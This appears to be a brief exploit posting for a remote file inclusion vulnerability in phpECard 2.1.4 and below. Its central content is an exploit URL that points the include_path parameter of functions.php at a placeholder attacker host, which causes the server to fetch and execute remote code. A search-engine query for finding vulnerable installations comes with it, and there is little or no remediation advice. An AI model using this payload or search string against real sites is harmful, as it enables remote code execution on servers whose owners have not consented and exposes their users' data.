PHPECard versions 2.1.4 and below suffer from a remote file inclusion vulnerability in functions.php.
6d9e27b11a3c56f57bff35f85ddd6080fa6b0ad9b0ebaaded8a37530c60bc221
#==============================================================================================
# phpECard (functions.php) Remote File Inclusion Exploit
#===============================================================================================
#
#Critical Level : Dangerous
#
#Venedor site : http://www.quick-xs.net/phpecard/
#
#Google Search: powered by: phpecard
#
#================================================================================================
#================================================================================================
#
#Exploit :
#--------------------------------
#
#http://sitename.com/[Script Path]/functions.php?include_path=http://evil_script?
#
#
#================================================================================================
#Discoverd By : LeAk
#
#Conatact : Escape_LeAk[at]yahoo.com
#
# Turkis Hackers
==================================================================================================